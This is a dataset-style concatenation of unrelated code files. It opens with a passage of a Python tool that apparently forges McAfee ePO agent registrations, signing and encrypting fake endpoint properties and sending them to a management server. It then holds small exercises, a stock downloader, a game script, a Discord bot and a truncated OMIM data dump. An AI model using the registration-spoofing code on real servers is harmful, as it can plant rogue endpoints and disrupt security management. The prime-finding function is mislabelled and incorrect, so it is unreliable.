b'\n\x00\x00\x00PlatformID\n\x00\x00\x00W2KW:5:0:4'
b'\r\x00\x00\x00PolicyVersion\x01\x00\x00\x000'
b'\x0c\x00\x00\x00PropsVersion\x0e\x00\x00\x0020170724000500'
b'\x0e\x00\x00\x00SequenceNumber\x01\x00\x00\x003') + \
b'\r\x00\x00\x00ServerKeyHash' + len(self.serverkeyhash).to_bytes(4, 'little') + self.serverkeyhash + \
(b'\x0f\x00\x00\x00SiteinfoVersion\x01\x00\x00\x000'
b'\x15\x00\x00\x00SupportedSPIPEVersion\x0b\x00\x00\x003.0;4.0;5.0'
b'\x0b\x00\x00\x00TaskVersion\x01\x00\x00\x000') + \
b'\x0f\x00\x00\x00TransactionGUID' + len(self.transaction_guid).to_bytes(4, 'little') + self.transaction_guid
return self.header_2
def build_fullprops(self):
"""Build endpoint properties"""
fullprops_xml = (b'<?xml version="1.0" encoding="UTF-8"?><ns:naiProperties xmlns:ns="naiProps" FullProps="true" PropsVersion="20170724000500" '
b'MachineID="{%s}" MachineName="%s">'
b'<ComputerProperties>'
b'<PlatformID>W2KW:5:0:4</PlatformID><ComputerName>%s</ComputerName>'
b'<ComputerDescription>N/A</ComputerDescription>'
b'<CPUType>Big Ass Mainframe</CPUType>'
b'<NumOfCPU>I dont know</NumOfCPU>'
b'<CPUSpeed>I got no idea</CPUSpeed>'
b'<OSType>Windows 2000</OSType>'
b'<OSBitMode>0</OSBitMode>'
b'<OSPlatform>Professional</OSPlatform>'
b'<OSVersion>5.0</OSVersion>'
b'<OSBuildNum>2195</OSBuildNum>'
b'<OSCsdVersion>Service Pack 4</OSCsdVersion>'
b'<TotalPhysicalMemory>2146938880</TotalPhysicalMemory>'
b'<FreeMemory>1896656896</FreeMemory>'
b'<TimeZone>Eastern Standard Time</TimeZone>'
b'<DefaultLangID>0409</DefaultLangID>'
b'<EmailAddress>W2KW</EmailAddress>'
b'<CPUSerialNumber>I dont know</CPUSerialNumber>'
b'<OSOEMId>51873-OEM-0003972-38082</OSOEMId>'
b'<LastUpdate>01/14/9999 20:05:00</LastUpdate>'
b'<UserName>Administrator</UserName>'
b'<DomainName>WORKGROUP</DomainName>'
b'<IPHostName>%s</IPHostName>'
b'<IPXAddress>N/A</IPXAddress>'
b'<Total_Space_of_Drive_C>20471.00</Total_Space_of_Drive_C>'
b'<Free_Space_of_Drive_C>16777.00</Free_Space_of_Drive_C>'
b'<NumOfHardDrives>1</NumOfHardDrives>'
b'<TotalDiskSpace>20471.00</TotalDiskSpace>'
b'<FreeDiskSpace>16777.00</FreeDiskSpace>'
b'<IPAddress>192.168.236.199</IPAddress>'
b'<SubnetAddress>192.168.236.0</SubnetAddress>'
b'<SubnetMask>255.255.255.0</SubnetMask>'
b'<NETAddress>000C2923AC18</NETAddress>'
b'<IsPortable>0</IsPortable>'
b'</ComputerProperties>'
b'<ProductProperties SoftwareID="PCR_____1000" delete="false">'
b'<Section name="General">'
b'<Setting name="szInstallDir">C:\\Program Files\\McAfee\\Common Framework</Setting>'
b'<Setting name="PluginVersion">9.0.0.1532</Setting>'
b'<Setting name="Language">0000</Setting>'
b'</Section>'
b'</ProductProperties><ProductProperties SoftwareID="EPOAGENT3000" delete="false">'
b'<Section name="General">'
b'<Setting name="szInstallDir">C:\\Program Files\\McAfee\\Common Framework</Setting>'
b'<Setting name="PluginVersion">9.0.0.1532</Setting>'
b'<Setting name="Language">0409</Setting>'
b'<Setting name="ServerKeyHash">%s</Setting>'
b'<Setting name="AgentGUID">{%s}</Setting>'
b'<Setting name="szProductVer">9.0.0.1532</Setting>'
b'<Setting name="bEnableSuperAgent">0</Setting>'
b'<Setting name="bEnableSuperAgentRepository">0</Setting>'
b'<Setting name="VirtualDirectory"></Setting>'
b'<Setting name="bEnableAgentPing">1</Setting>'
b'<Setting name="AgentBroadcastPingPort">8082</Setting>'
b'<Setting name="AgentPingPort">8081</Setting>'
b'<Setting name="ShowAgentUI">0</Setting>'
b'<Setting name="ShowRebootUI">1</Setting>'
b'<Setting name="RebootTimeOut">-1</Setting>'
b'<Setting name="PolicyEnforcementInterval">5</Setting>'
b'<Setting name="CheckNetworkMessageInterval">60</Setting>'
b'</Section>'
b'</ProductProperties>'
b'</ns:naiProperties>' \
% (self.agent_guid, self.agent_hostname, self.agent_hostname, self.agent_hostname, self.serverkeyhash, self.agent_guid))
self.fullprops_xml = b'\x02\x00\x09\x00' + b'Props.xml' + struct.pack('<I', len(fullprops_xml)) + fullprops_xml
return self.fullprops_xml
def build_request(self):
"""Build registration request data """
self.build_header_2_40()
self.build_fullprops()
data_compressed = mcafee_crypto.mcafee_compress(self.agent_pubkey_epo_format + self.fullprops_xml)
data_len = struct.pack('<I', len(data_compressed))
final_header_len = struct.pack('<I', len(self.build_header_1()) + len(self.build_header_2_40()))
self.build_header_1(final_header_len, data_len)
final_header_1 = mcafee_crypto.xor_c(self.header_1)
request_signature = mcafee_crypto.dsa_sign(self.regkey, self.header_1 + self.header_2 + data_compressed)
data_encrypted = mcafee_crypto.mcafee_3des_encrypt(self.header_2 + data_compressed + request_signature)
post_data = mcafee_crypto.xor_c(final_header_1) + data_encrypted
return post_data
def send_request(self):
post_data = self.build_request()
http_req = b'POST /spipe/pkg?AgentGuid={%s}' % self.agent_guid \
+ b'&Source=Agent_3.0.0 HTTP/1.0\r\nAccept: application/octet-stream\r\nAccept-Language: en-us\r\n' \
+ b'User-Agent: Mozilla/4.0 (compatible; SPIPE/3.0; Windows)\r\nHost: EPO59.laptoplab.local\r\n' \
+ b'Content-Length: %d\r\nContent-Type: application/octet-stream\r\n\r\n' % len(post_data) \
+ post_data
try:
self.epo = socket.socket()
self.epo = ssl.wrap_socket(self.epo)
self.epo.settimeout(1)
print(self.agent_hostname)
self.epo.connect(('192.168.0.245', 443))
self.epo.send(http_req)
except socket.error:
print('Error connect to ePo server')
try:
receive_data = self.epo.recv(8192)
if len(receive_data) > 0:
server_response_code = receive_data[0: receive_data.find(b'\r\n')]
print(server_response_code)
else:
print('Server closes the connection')
except socket.error:
print('socket error')
def main():
parser = argparse.ArgumentParser(description='Python EPO Agent')
parser.add_argument('target', type=str, help='Target EPO Server or Agent Handler IP Address')
parser.add_argument('--port', type=int, default=443, help='Secure ASIC Port, default=443')
# parser.add_argument('action', choices=['Register'], help='Action to perform. Supported Action: Register')
args = parser.parse_args()
epo_port = args.port
epo_url = "https://{}:{}/Software/Current/EPOAGENT3000/Install/0409/".format(args.target, epo_port)
guid = endpoint.generate_GUID().encode()
hostname = endpoint.generate_hostname().encode()
mac_address = endpoint.generate_MAC().encode()
print("Registering endpoint: {}".format(hostname.decode()))
a = Build_Registration_Request(epo_url, guid, guid, hostname, mac_address)
a.send_request()
if __name__ == "__main__":
main()
|
17,048 | be8166d3a9bdad64e979687dc9a2d4e111c38421 | n = int(input())
maior = 0
for i in range(n):
m,nota = map(float,input().split())
if(nota>maior):
maior = nota
id = m
if(maior>=8):
print(int(id))
else:
print("Minimum note not reached")
|
17,049 | ae46d65298453577458eea8854505749cbde0ae4 | # Generate the Fibonacci sequence
def find_primes(num):
primes = []
non_primes = []
for i in range(2, num + 1):
if i % 2 == 0 and i > 2:
non_primes.append(i)
elif i % 3 == 0 and i > 3:
non_primes.append(i)
elif i % 5 == 0 and i > 5:
non_primes.append(i)
elif i % 7 == 0 and i > 7:
non_primes.append(i)
elif i % 11 == 0 and i > 11:
non_primes.append(i)
else:
primes.append(i)
return primes
#code here
NUMBER = iter(find_primes(1000))
print(f'The first prime number is {next(NUMBER)}.\n')
# print(f'The prime numbers are: {find_primes(number)}')
while True:
try:
CONTINUE = input("Would you like to see the next prime number? (Y/n): ")
if CONTINUE.lower() == 'y':
print(f'The next prime number is {next(NUMBER)}.')
continue
elif CONTINUE.lower() == 'n':
print("Exiting")
break
except:
print("Incorrect entry. You must enter Y or n.\n")
continue
else:
break |
17,050 | 2339567a9db89b09b50608ee14ff5ab12613cffd | #!/usr/bin/env python
import os
import subprocess
from rpyc import Service
from rpyc.utils.server import ThreadedServer
class TestService(Service):
""" Test Service """
def exposed_start_listen(self):
subprocess.Popen("ib_send_lat -d rxe0 -a -F", shell = True)
def exposed_start_send(self):
os.system("ib_send_lat 192.168.13.22 -a -F -d rxe0")
if __name__ == "__main__":
srv = ThreadedServer(TestService, port = 30240, auto_register = False)
srv.start()
print ">>> Server Started!"
|
17,051 | eccd1337ae3e56c58cbbe7b74bd1d0753736f398 | import socket
def run():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("localhost", 8081)) # 连接服务器
sock.sendall(bytes("hello from client","utf-8")) # 将消息输出到发送缓冲 send buffer
print(sock.recv(1024)) # 从接收缓冲 recv buffer 中读响应
sock.close() # 关闭套接字...
if __name__=="__main__":
run() |
17,052 | 24f071da834dfbcec3a595991101d0503a5c8181 | def day1(fileName):
floor = 0
firstBasement = None
with open(fileName) as infile:
chars = infile.readline()
for position, char in enumerate(chars):
if char == '(':
floor += 1
elif char == ')':
floor -= 1
if floor < 0 and firstBasement is None:
firstBasement = position + 1
print(f"Floor: {floor}")
print(f"First basement: {firstBasement}")
if __name__ == "__main__":
day1("1.txt")
|
17,053 | 1054139f7e7df8dd12d9f249bf354cc38d00a006 | import tushare as ts
import pandas as pd
class SHSZData(object):
"""docstring for SHSZData"""
def __init__(self, data_folder):
super(SHSZData, self).__init__()
stocks = ts.get_stock_basics()
self.stocks = stocks[stocks['timeToMarket'] != 0]
self.DATA_FOLDER = data_folder
def download_d_all(self):
"""Download all data"""
for code, row in self.stocks.iterrows():
time_to_market = str(row['timeToMarket'])
start = "{}-{}-{}".format(time_to_market[:4], time_to_market[4:6], time_to_market[6:8])
self.download_d(code, start=start)
def download_d(self, code, start='2000-01-01', end='2023-01-01'):
"""docstring for download"""
print(f"Downloading {code}...")
df = ts.get_k_data(code, start=start, end=end)
df.to_csv(f"{self.DATA_FOLDER}/{code}.csv", index=False)
def retry_d(self):
from pathlib import Path
for code, row in self.stocks.iterrows():
csv_f = Path(f"{self.DATA_FOLDER}/{code}.csv")
if not csv_f.exists():
time_to_market = str(row['timeToMarket'])
start = "{}-{}-{}".format(time_to_market[:4], time_to_market[4:6], time_to_market[6:8])
self.download_d(code, start=start)
def update_d_all(self):
"""docstring for update_d_all"""
for code, row in self.stocks.iterrows():
self.update_d(code)
def update_d(self, code):
"""docstring for update_d"""
print(f"Updating {code}...")
old_df = self.get_d(code)
str_latest_date = old_df.iloc[-1]['date']
start = pd.to_datetime(str_latest_date, format='%Y-%m-%d') + pd.DateOffset(1)
new_df = ts.get_k_data(code, start.strftime('%Y-%m-%d'))
if not new_df.empty:
new_df = new_df.sort_values(by='date')
df = old_df.append(new_df, ignore_index=True)
df.to_csv(f"{self.DATA_FOLDER}/{code}.csv", index=False)
def get_d(self, code):
"""docstring for read_d"""
df = pd.read_csv(f'{self.DATA_FOLDER}/{code}.csv', delimiter=',', header=0)
df = df.sort_values(by='date')
return df
def get_basic(self, code):
"""docstring for get_name"""
return self.stocks.loc[code]
class SHSZSelection(object):
"""docstring for SHSZSelection"""
def __init__(self, data_folder, selection_func, equities=None):
super(SHSZSelection, self).__init__()
self.selection_func = selection_func
self.DATA_FOLDER = data_folder
stocks = ts.get_stock_basics()
stocks = stocks[stocks['timeToMarket'] != 0]
self.equities = equities if equities else stocks.index.values
def run(self):
results = None
for e in self.equities:
df = pd.read_csv(f'{self.DATA_FOLDER}/{e}.csv', delimiter=',', header=0)
df = df.sort_values(by='date')
rs = self.selection_func(e, df)
results = pd.concat([results, rs])
return results
|
17,054 | b2ff6973060a9d18c4ad7dd7a133e3f4c2f19bb2 |
def armstrong(i):
t = i
s = 0
while t > 0:
d = t % 10
s = s + d*d*d
t = t // 10
if s == i:
print('YES')
else:
print('NO')
number = int(input())
armstrong(number) |
17,055 | f8c33b3de56964e00d7f8e76e50d4b1a057c36ca | import urllib
import json
import requests
import urllib.request
import pandas as pd
import time
import datetime
from time import localtime, strftime
import numpy as np
import statsmodels.api as sm
df = pd.read_csv('./종단기상관측소.csv',encoding='cp949')
df.columns = df.columns.str.replace(' ','')
def get_Weather_xml():
loca=""
url="https://data.kma.go.kr/OPEN_API/AWSM/2016/09/XML/awsmdays_96.xml"
request = urllib.request.Request(url)
response = urllib.request.urlopen(request)
data=response.read()
print(data)
# get_Weather_xml()
def get_test():
df2 = pd.read_csv('./sanbul2.csv', encoding='cp949')
df2.columns = df2.columns.str.replace(' ', '')
print(df2.columns)
# get_test()
def time_test():
c=datetime.date(2018,11,22)
bc=time.localtime()
d=df['시작일'][1]
dt1 = datetime.datetime(2018,11,22, 0)
dt2 = datetime.datetime(2019,2,23, 0)
date.today()
print(c)
print(d)
print(bc)
print(dt1-dt2)
# time_test()
def t_test():
# Read the data set into a pandas DataFrame
churn = pd.read_csv('hong2.csv', sep=',', header=0,encoding='cp949')
churn.columns = [heading.lower() for heading in \
churn.columns.str.replace(' ', '_').str.replace("\'", "").str.strip('?')]
# churn.loc[churn['피해면적_합계'] < 0.5, '피해면적'] = 1
# churn.loc[churn['피해면적_합계'] >= 0.5, '피해면적'] = 2
# churn.loc[churn['피해면적_합계'] >= 1, '피해면적'] = 3
# churn.loc[churn['피해면적_합계'] >= 2, '피해면적'] = 4
# churn.loc[churn['피해면적_합계'] >= 3, '피해면적'] = 5
# churn.loc[churn['피해면적_합계'] >= 5, '피해면적'] = 6
# churn.loc[churn['피해면적_합계'] >= 7, '피해면적'] = 7
# churn.loc[churn['피해면적_합계'] >= 13, '피해면적'] = 8
# churn.loc[churn['피해면적_합계'] >= 50, '피해면적'] = 9
# churn.loc[churn['피해면적_합계'] >= 200, '피해면적'] = 10
# churn['churn01'] = np.where(churn['churn'] == 'True.', 1., 0.)
# churn['total_charges'] = churn['day_charge'] + churn['eve_charge'] + \
# churn['night_charge'] + churn['intl_charge']
dependent_variable = churn['산불']
independent_variables = churn[['기온','습도','풍속','풍향']]
independent_variables_with_constant = sm.add_constant(independent_variables, prepend=True)
logit_model = sm.Logit(dependent_variable, independent_variables_with_constant).fit()
print(logit_model.summary()) # error 발생
# print("\nQuantities you can extract from the result:\n%s" % dir(logit_model))
print("\nCoefficients:\n%s" % logit_model.params)
print("\nCoefficient Std Errors:\n%s" % logit_model.bse)
t_test()
def test2():
# Read the data set into a pandas DataFrame
churn = pd.read_csv('churn.csv', sep=',', header=0)
churn.columns = [heading.lower() for heading in \
churn.columns.str.replace(' ', '_').str.replace("\'", "").str.strip('?')]
churn['churn01'] = np.where(churn['churn'] == 'True.', 1., 0.)
churn['total_charges'] = churn['day_charge'] + churn['eve_charge'] + \
churn['night_charge'] + churn['intl_charge']
dependent_variable = churn['churn01']
independent_variables = churn[['account_length', 'custserv_calls', 'total_charges']]
independent_variables_with_constant = sm.add_constant(independent_variables, prepend=True)
logit_model = sm.Logit(dependent_variable, independent_variables_with_constant).fit()
print(logit_model.summary()) # error 발생
# print("\nQuantities you can extract from the result:\n%s" % dir(logit_model))
print("\nCoefficients:\n%s" % logit_model.params)
print("\nCoefficient Std Errors:\n%s" % logit_model.bse)
# test2() |
17,056 | a8ae9946f55679b2b3aace8e92ab69c16ffd4dae | Start_Block=Besiege.GetBlock("5c19343b-d7d5-4913-b78f-b1c5b63ba54b")
Front_Left_Wheel=Besiege.GetBlock("ef13b691-c552-45ac-a4aa-1cd578d3f440")
Front_Right_Wheel=Besiege.GetBlock("b2c35c71-a60f-4757-b9c8-a5f39fec1079")
Rear_Left_Wheel=Besiege.GetBlock("b2b8eda7-affb-4020-8294-3b1ccc1e811a")
Rear_Right_Wheel=Besiege.GetBlock("cc8c86f9-21cc-4950-9421-b21a151ad1d0")
Rear_Left_Wheel_1=Besiege.GetBlock("dd1677db-1594-45f7-80e5-33b38222be70")
Rear_Right_Wheel_1=Besiege.GetBlock("68f06512-0fb6-438b-906d-a47e0c1a1771")
Left_Hinge=Besiege.GetBlock("eaa31090-0c47-4e69-b9ef-4e3763c1f78f")
Right_Hinge=Besiege.GetBlock("6815a701-e291-424c-a8c4-fe41b79895ac")
Left_Momentum=Besiege.GetBlock("2bdbb7e4-478f-46c0-99bf-8638d59d872c")
Right_Momentum=Besiege.GetBlock("7f53b023-a9fc-40c3-a498-57226fac4d44")
cd=0
def FixedUpdate():
global cd
v3=Start_Block.Velocity
v1=(v3.x**2+v3.y**2+v3.z**2)**0.5
c=-0.00581728+0.0711999*v1+0.000212488*v1**2-3.84276*10**-6*v1**3+4.34906*10**-8*v1**4
if c>4:
c=4
if Input.GetKey(KeyCode.DownArrow) and c>2.5:
c=2.5
if Input.GetKey(KeyCode.UpArrow):
cd=1
if Input.GetKey(KeyCode.DownArrow):
cd=0.5-2*c
vfl=c+cd
vfr=c+cd
vrl=c+cd
vrr=c+cd
al=0
ar=0
vl=5
vr=5
if Input.GetKey(KeyCode.LeftArrow):
al=30
ar=25
if Input.GetKey(KeyCode.RightArrow):
al=-25
ar=-30
if Left_Hinge.GetAngle()>=0 and Right_Hinge.GetAngle()>=0:
vl=2.5
vr=3
if Left_Hinge.GetAngle()<=0 and Right_Hinge.GetAngle()<=0:
vl=3
vr=2.5
if Left_Hinge.GetAngle()>=0 and Right_Hinge.GetAngle()>=0 and Input.GetKey(KeyCode.RightArrow):
vfl=vfl*1.18275
vfr=vfr*0.893188
vrl=vrl*0.631579
vrr=vrr
if Left_Hinge.GetAngle()<=0 and Right_Hinge.GetAngle()<=0 and Input.GetKey(KeyCode.LeftArrow):
vfl=vfl*0.893188
vfr=vfr*1.18275
vrl=vrl*0.631579
vrr=vrr
Front_Left_Wheel.SetSliderValue("SPEED",vfl)
Front_Right_Wheel.SetSliderValue("SPEED",vfr)
Rear_Left_Wheel.SetSliderValue("SPEED",vrl)
Rear_Left_Wheel_1.SetSliderValue("SPEED",vrl)
Rear_Right_Wheel.SetSliderValue("SPEED",vrr)
Rear_Right_Wheel_1.SetSliderValue("SPEED",vrr)
Left_Momentum.SetSliderValue("SPEED",c*1.5)
Right_Momentum.SetSliderValue("SPEED",c*1.5)
Left_Hinge.SetAngle(al)
Right_Hinge.SetAngle(ar)
Left_Hinge.SetSliderValue("ROTATION SPEED",vl)
Right_Hinge.SetSliderValue("ROTATION SPEED",vr)
Besiege.Watch("Speed",round(v1*3.6)) |
17,057 | 893c7c897103cb88b6d3c44ba6a332847fcff708 | import discord
import asyncio
from discord.ext import commands
import random
class Poll(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(pass_context=True, aliases=['poll'])
async def sondage(self, ctx, question, options: str, emojis: str):
await ctx.message.delete()
author = ctx.message.author
server = ctx.message.guild
extract_options = options.replace("+", " ")
option = extract_options.split(" ")
extract_emojis = emojis.replace("+", " ")
emoji = extract_emojis.split(" ")
if len(options) <= 1:
await ctx.send("Erreur, vous devez avoir plusieurs options.")
return
if len(emojis) <= 1:
await ctx.send("Erreur, vous devez avoir le même nombre d'options.")
if len(options) > 2:
if len(emojis) > 2:
reactions = emoji
# print(reactions)
description = []
for x, extract_options in enumerate(option):
description += '\n {} {}'.format(reactions[x], option[x].replace("_", " "))
embed = discord.Embed(title = question, colour=discord.Colour.from_rgb(210, 66, 115), description = ''.join(description))
react_message = await ctx.send(embed = embed)
for reaction in reactions[:len(option)]:
await react_message.add_reaction(reaction)
embed.set_footer(text=f'ID Sondage : {react_message.id} \nAuteur du sondage : {author}')
await react_message.edit(embed=embed)
def setup(bot):
bot.add_cog(Poll(bot))
|
17,058 | ed3b0bbe062a526fa9845cb6fce7093f1981da76 | # =============== For Translator ================================
from googletrans import Translator
sentence = str(input("The sectence: "))
translator = Translator()
tr_sen = translator.translate(sentence, src='ur', dest='en')
s = tr_sen
print(tr_sen.text)
x = translator.translate(str(s), src='en', dest='ur')
print(x.text)
|
17,059 | 11794690df0fc439535f88b1fafc7d2cdedeb7cd | class Solution:
def summaryRanges(self, nums):
result = []
if len(nums) == 0:
return result
temp = str(nums[0])
for i in xrange(1,len(nums)):
if nums[i] != nums[i-1]+1:
if temp == str(nums[i-1]):
result.append(temp)
else:
result.append(temp+'->'+str(nums[i-1]))
temp = str(nums[i])
if temp != str(nums[-1]):
result.append(temp+'->'+str(nums[-1]))
else:
result.append(temp)
return result
a = Solution()
print a.summaryRanges([0])
|
17,060 | 7709289bd2511b66cca64b62d03b3eda7f992886 | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
from typing import Optional
import attr
from marshmallow3_annotations.ext.attrs import AttrsSchema
@attr.s(auto_attribs=True, kw_only=True)
class GenerationCode:
key: Optional[str]
text: str
source: Optional[str]
class GenerationCodeSchema(AttrsSchema):
class Meta:
target = GenerationCode
register_as_scheme = True
|
17,061 | 8448c024c1bb5ba3b227d03545a78e744067300c | omim = {'omim': {
'version': '1.0',
'searchResponse': {
'search': '*',
'expandedSearch': '*:*',
'parsedSearch': '+*:* ()',
'searchSuggestion': None,
'searchSpelling': None,
'filter': '',
'expandedFilter': None,
'fields': '',
'searchReport': None,
'totalResults': 7368,
'startIndex': 6200,
'endIndex': 6219,
'sort': '',
'operator': '',
'searchTime': 3.0,
'clinicalSynopsisList': [
{'clinicalSynopsis': {
'mimNumber': 613364,
'prefix': '%',
'preferredTitle': 'SPASTIC PARAPLEGIA 41, AUTOSOMAL DOMINANT; SPG41',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'genitourinaryBladder': 'Urinary urgency {SNOMEDCT:75088002} {ICD10CM:R39.15} {ICD9CM:788.63} {UMLS C4553976,C0085606 HP:0000012} {HPO HP:0000012 C0085606,C3544092,C4020898}',
'muscleSoftTissue': 'Mild weakness of the small hand muscles {UMLS C3278778}',
'neurologicCentralNervousSystem': '''Spastic paraplegia {SNOMEDCT:192967009} {UMLS C0037772 HP:0001258} {HPO HP:0001258 C0037772};\nSpastic gait {SNOMEDCT:9447003} {ICD10CM:R26.1} {UMLS C0231687 HP:0002064} {HPO HP:0002064 C0231687};\nLower limb muscle weakness, proximal {UMLS C1866010 HP:0008994};\nHyperreflexia {SNOMEDCT:86854008} {UMLS C0151889 HP:0001347} {HPO HP:0001347 C0151889}''',
'miscellaneous': '''Average age at onset 16.6 years {UMLS C3278779};\nOne 4-generation Chinese family has been reported (as of 04/2010) {UMLS C3278780}''',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': True,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': False,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613307,
'prefix': '#',
'preferredTitle': 'DEAFNESS, AUTOSOMAL RECESSIVE 79; DFNB79',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckEars': 'Hearing loss, sensorineural, progressive (severe to profound) {UMLS C4229862} {HPO HP:0000408 C1843156}',
'miscellaneous': '''Dutch, Pakistani, and Moroccan families have been described {UMLS C4229860};\nOnset of hearing loss in first decade of life {UMLS C4229859}''',
'molecularBasis': 'Caused by mutation in the taperin gene (TPRN, {613354.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613308,
'prefix': '#',
'preferredTitle': 'DIAMOND-BLACKFAN ANEMIA 9; DBA9',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'growthOther': 'Growth retardation {SNOMEDCT:59576002,444896005} {UMLS C0151686 HP:0001510} {HPO HP:0001510 C0151686,C0456070,C0878787,C1837385,C3552463}',
'headAndNeckFace': 'Cathie facies {UMLS C4314925}',
'headAndNeckNeck': 'Webbed neck (rare) {UMLS C3554266} {HPO HP:0000465 C0221217}',
'hematology': 'Anemia {SNOMEDCT:271737000} {ICD10CM:D64.9} {ICD9CM:285.9} {UMLS C0002871,C4554633,C1000483 HP:0001903} {HPO HP:0001903 C0002871,C0162119}',
'laboratoryAbnormalities': 'Vitamin D deficiency {SNOMEDCT:34713006} {ICD10CM:E55,E55.9} {ICD9CM:268,268.9} {UMLS C0042870 HP:0100512} {HPO HP:0100512 C0042870}',
'miscellaneous': '''Some patients are steroid responsive {UMLS C4314939};\nAge at diagnosis ranged from birth to 12 years {UMLS C4314844};\nLimited clinical information provided {UMLS C4230773}''',
'molecularBasis': 'Caused by mutation in ribosomal protein S10 (RPS10, {603632.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': True,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': True,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
